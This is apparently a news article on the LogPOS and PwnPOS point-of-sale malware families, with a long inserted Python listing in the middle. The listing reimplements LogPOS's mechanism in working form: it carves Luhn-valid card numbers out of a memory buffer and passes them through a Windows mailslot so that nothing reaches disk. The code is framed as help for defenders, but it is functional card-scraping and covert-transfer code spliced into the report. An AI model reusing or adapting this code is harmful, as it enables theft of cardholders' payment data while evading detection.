Security researchers have discovered two point-of-sale (POS) malware families: “PwnPOS,” which showcases attackers' “simple but thoughtful construction” for skirting detection, and the “LogPOS” family that uses Microsoft Windows' mailslots to deliver stolen credit card data to attackers.
The latter threat, LogPOS, was uncovered by Cincinnati-based security firm Morphick last week.
In a blog post, Morphick researcher Nick Hoffman explained that using Windows mailslots “isn't a new mechanism for malware,” as it has been previously leveraged in APT attacks, but one that has apparently been added to POS malware authors' arsenals. According to Microsoft, a mailslot is a mechanism for one-way interprocess communications (IPC), where applications can store messages and mailslot owners can retrieve them. In this case, the authors of LogPOS took advantage of the mechanism to store, and later collect, credit card data, Hoffman wrote.
“Because LogPOS injects code into various processes and has each of them search their own memory, it can't use a log, since they can't all open the same file with write access at once,” Hoffman wrote. “Instead, it uses mailslots.”
“In this case, the main executable creates the mailslot and acts as the mailslot server, while the code injected into the various processes acts as a client, writing carved credit card numbers to the mailslot for direct transmission to the C2 [server],” he explained later.
In its blog post, the firm published a YARA rule so enterprises can detect LogPOS variants.
Hoffman noted that the malware family's mailslot capability helps it skirt traditional methods for identifying POS threats, such as scanning files for unencrypted credit card data, because the malware writes the carved data to a mailslot rather than to a file on disk. He added that he doesn't expect the pace at which new POS malware families appear to slow, despite the community's efforts to thwart such threats.
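To make the mechanism Hoffman describes concrete, here is an added example written for this page; it is not LogPOS's code and not Morphick's. It does the two jobs the article attributes to the malware: carve Luhn-valid card numbers out of a process-memory buffer (the injected clients' work) and pass each one to a collector through a Windows mailslot instead of a file (the main executable acting as mailslot server). The mailslot name `\\.\mailslot\pan_channel`, the helper names, and the sample buffer with its well-known test card numbers are all assumptions constructed for the example. The carving and Luhn check run on any platform; the mailslot round-trip uses the Win32 API through ctypes and only runs on Windows.

```python
"""Added illustration (not LogPOS's code): carve Luhn-valid card numbers out of a
process-memory buffer, as the injected client code does, then hand each one to a
collector over a Windows mailslot rather than a file. Names here are assumed."""
import re
import sys
from typing import List

# 13-19 digit runs bounded by non-digits; shorter or longer runs are skipped.
_PAN_RE = re.compile(rb"(?<![0-9])([0-9]{13,19})(?![0-9])")

def luhn_ok(digits: str) -> bool:
    """Luhn checksum, used to discard digit runs that are not card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = ord(ch) - ord("0")
        if i % 2 == 1:                      # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def carve_pans(memory: bytes) -> List[str]:
    """Return the distinct Luhn-valid digit runs in `memory`, in order found."""
    found: List[str] = []
    for m in _PAN_RE.finditer(memory):
        run = m.group(1).decode("ascii")
        if luhn_ok(run) and run not in found:
            found.append(run)
    return found

# Constructed memory sample: two well-known test PANs (one in a track-2 style
# record) plus an order id and a timestamp, both digit runs that fail Luhn.
SAMPLE_MEMORY = (
    b"\x00\x00POS-TXN\x00;4111111111111111=25121010000000000000?\x00"
    b"ORDER 1234567890123456\x00cardholder 5555555555554444 APPROVED\x00"
    b"timestamp 20150301120000\x00"
)

# --- Mailslot transport (Windows only, via ctypes) --------------------------
IS_WINDOWS = sys.platform == "win32"
MAILSLOT_NAME = r"\\.\mailslot\pan_channel"     # assumed name for this example
MAX_MSG = 256

if IS_WINDOWS:
    import ctypes
    from ctypes import wintypes as wt
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.CreateMailslotW.argtypes = [wt.LPCWSTR, wt.DWORD, wt.DWORD, wt.LPVOID]
    k32.CreateMailslotW.restype = wt.HANDLE
    k32.CreateFileW.argtypes = [wt.LPCWSTR, wt.DWORD, wt.DWORD, wt.LPVOID,
                                wt.DWORD, wt.DWORD, wt.HANDLE]
    k32.CreateFileW.restype = wt.HANDLE
    k32.WriteFile.argtypes = [wt.HANDLE, wt.LPCVOID, wt.DWORD,
                              ctypes.POINTER(wt.DWORD), wt.LPVOID]
    k32.ReadFile.argtypes = [wt.HANDLE, wt.LPVOID, wt.DWORD,
                             ctypes.POINTER(wt.DWORD), wt.LPVOID]
    k32.CloseHandle.argtypes = [wt.HANDLE]
    INVALID_HANDLE_VALUE = wt.HANDLE(-1).value
    GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING = 0x40000000, 0x1, 3
    FILE_ATTRIBUTE_NORMAL, MAILSLOT_WAIT_FOREVER = 0x80, 0xFFFFFFFF

def server_create():
    """Collector side: create and own the slot (the main executable's role)."""
    h = k32.CreateMailslotW(MAILSLOT_NAME, MAX_MSG, MAILSLOT_WAIT_FOREVER, None)
    if h == INVALID_HANDLE_VALUE:
        raise ctypes.WinError(ctypes.get_last_error())
    return h

def client_send(message: bytes) -> None:
    """Injected-code side: open the slot for write and drop one message in."""
    h = k32.CreateFileW(MAILSLOT_NAME, GENERIC_WRITE, FILE_SHARE_READ, None,
                        OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, None)
    if h == INVALID_HANDLE_VALUE:
        raise ctypes.WinError(ctypes.get_last_error())
    written = wt.DWORD(0)
    ok = k32.WriteFile(h, message, len(message), ctypes.byref(written), None)
    k32.CloseHandle(h)
    if not ok:
        raise ctypes.WinError(ctypes.get_last_error())

def server_read(h) -> bytes:
    """Collector side: pull one queued message off the slot."""
    buf, got = ctypes.create_string_buffer(MAX_MSG), wt.DWORD(0)
    if not k32.ReadFile(h, buf, MAX_MSG, ctypes.byref(got), None):
        raise ctypes.WinError(ctypes.get_last_error())
    return buf.raw[:got.value]

def exfil_via_mailslot(memory: bytes) -> List[bytes]:
    """Windows only: carve PANs, send each as a client would, and return what
    the server side receives. Nothing touches the file system."""
    server = server_create()
    try:
        pans = carve_pans(memory)
        for pan in pans:
            client_send(pan.encode("ascii"))
        return [server_read(server) for _ in pans]
    finally:
        k32.CloseHandle(server)
```

On the sample buffer `carve_pans` returns only the two test PANs: the 20-digit run after the `=` separator, the order id and the timestamp are all dropped by the length bound or the Luhn check. The point for defenders is in the second half: because every client writes to the mailslot and nothing is written to disk, a scanner that greps files for PAN-shaped digit runs sees nothing, and the same carve-and-Luhn pass has to be run against process memory, or the mailslot creation itself has to be noticed, to catch this family.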
Last week, Trend Micro threat analyst Jay Yaneza published details of another new POS malware family, dubbed “PwnPOS.” Yaneza said the malware, potentially active since 2013, was able to “fly under the radar all these years due to its simple but thoughtful construction.”